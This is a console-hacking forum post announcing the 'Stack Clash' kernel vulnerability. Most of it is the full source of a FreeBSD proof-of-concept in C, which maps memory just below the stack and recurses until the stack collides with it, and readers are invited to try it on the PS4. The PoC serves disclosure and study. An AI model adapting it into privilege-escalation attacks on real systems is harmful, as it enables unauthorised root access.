Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 CFW and Hacks       Thread starter FabOne       Start date Jun 20, 2017 at 1:30 PM       26      
Status
Not open for further replies.
Following the recently reported Spread Overflow Exploit WebKit Bugs and PS4 MEMEs, a new massive vulnerability in Linux-Kernel, FreeBSD, OpenBSD, Solaris and Unix-based OSes called "Stack Clash" was rediscovered and can be used to gain root privileges on the affected systems. :geek:

Here are some related links with details on the Stack Clash bug:
According to PS4 developers it's currently untested on the PlayStation 4, so if anyone gives it a try let us know your results in this ongoing discussion thread.
Download: 001-stackclash.c
Code:
/*-
 * Copyright (c) 2017 Shawn Webb <[email protected]>
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above
 *    copyright notice, this list of conditions and the following
 *    disclaimer.
 * 2. Redistributions in binary form must reproduce the above
 *    copyright notice, this list of conditions and the following
 *    disclaimer in the documentation and/or other materials
 *    provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 *    products derived from this software without specific prior
 *    written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
 * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
 * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
 * USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
 * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 *
 * Stack Clash PoC for FreeBSD.
 *
 * Compile: clang -O0 -fPIE -pie -lprocstat -o 001-stackclash 001-stackclash.c
 *
 * Note: If the security.bsd.unprivileged_proc_debug sysctl node is
 * set to 0, then this PoC as it's written requires root privileges.
 * Since FreeBSD lacks ASLR, you can simply gut out the libprocstat
 * integration and hardcode the stack address (be sure to use the
 * macros to round down to the bottom of the page). There are other
 * tricks you can do to find the stack address. Do what suits you
 * best.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/param.h>
#include <sys/queue.h>
#include <sys/user.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
#include <libprocstat.h>

unsigned char *
func(void)
{
	unsigned char buf[16];
	int i;

	for (i=0; i < sizeof(buf)-1; i++)
		if (buf[i] == 0x41 && buf[i+1] == 0x41)
			return (buf+i);

	return func();
}

int
main(int argc, char *argv[])
{
	struct procstat *ps;
	struct kinfo_proc *p;
	struct kinfo_vmentry *vm;
	unsigned int i, cnt;
	void *stack_start, *stack_end;
	unsigned char *map, *found;

	stack_start = stack_end = NULL;

	cnt = 0;

	ps = procstat_open_sysctl();
	if (ps == NULL) {
		perror("procstat_open_sysctl");
		return (1);
	}

	p = procstat_getprocs(ps, KERN_PROC_PID, getpid(), &cnt);
	if (cnt == 0) {
		perror("procstat_getprocs");
		return (1);
	}

	cnt = 0;
	vm = procstat_getvmmap(ps, p, &cnt);
	if (cnt == 0) {
		perror("procstat_getvmmap");
		return (1);
	}

	for (i=0; i<cnt; i++) {
		if (vm[i].kve_flags & KVME_FLAG_GROWS_DOWN) {
			stack_start = (void *)vm[i].kve_start;
			stack_end = (void *)vm[i].kve_end;
		}
	}

	if (stack_start == NULL)
		return (1);

	map = mmap(stack_start - (PAGE_SIZE * 2), PAGE_SIZE,
	    PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED
	    | MAP_ANON, -1, 0);

	if (map == (void *)MAP_FAILED) {
		perror("mmap");
		return (1);
	}

	printf("Mapping is at 0x%016lx\n", (unsigned long)map);
	printf("Stack start is at 0x%016lx\n", (unsigned long)stack_start);

	for (i=0; i < PAGE_SIZE; i++)
		map[i] = 0x41;

	found = func();
	if (found != NULL)
		printf("Found 0x41 at %p\n", found);

	return (0);
}
Thanks to @kazookid0 and @X41 for the heads-up in the PSXHAX Shoutbox on this news last night! :thumbup:
Stack Clash Vulnerability in Linux, FreeBSD, OpenBSD & Unix OSes.jpg
 

Comments

I should start a collection of all the quotes of people saying it will never happen and it won't ever be released anyways and all that dumb crap. That way when it finally does drop, I can combine them all into a giant gif supermeme. But ultimately i think they would value the attention more than they would dislike it.

Best thing to do is just let them rot in their own filth. After all, we didn't make them trolls. They chose to live under the bridge and charge a toll. The rest just fell into place.
 
Status
Not open for further replies.
Back
Top